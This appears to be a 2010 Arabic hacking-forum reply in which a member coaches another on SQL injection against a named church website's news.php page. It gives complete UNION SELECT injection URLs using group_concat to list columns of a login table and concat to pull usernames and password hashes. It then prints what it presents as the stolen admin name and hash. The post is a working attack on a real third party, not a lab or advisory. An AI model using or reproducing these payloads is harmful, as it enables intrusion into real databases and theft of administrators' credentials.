عرض مشاركة واحدة
قديم 10-28-2010, 01:41 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
aircrack -ng
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي


السلام عليكم اخي الكريم

اخي انت عملت هيك يعني طلعت الباس ورقم العضوية
concat)userid,0x3a,hashpass(
اخي الكريم ركز فقط في الحقنة استعمل الامر group_
ليصبح الاستغلال كذا

كود:
http://www.ach.org.il/news.php?id=-1+union+select+1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4++from+information_schema.columns+where+table_name=0x61706f735f6c6f67696e32--
الان طلعت معاي كل اليوزرات نشوف فيهم مين هي الانسب
apos_login2:userid:church_sitedb,
apos_login2:username:church_sitedb,
apos_login2:hashpass:church_sitedb,
apos_login2:counter:church_sitedb

انا اشوف الانسب الى يوزر الادمن هي username
يعني راح يكون الاستغلال

كود:
http://www.ach.org.il/news.php?id=-1+union+select+1,2,concat(username,0x3a,hashpass),4++from+apos_login2--
يغني concat(username,0x3a,hashpass)

اسم الادمن طلع AMiN
والباسورد طلع 1a5s6d456zxc456xz4c56xz4c46c

ان شاء الله اكون فدتك ولو بالقليل


   

رد مع اقتباس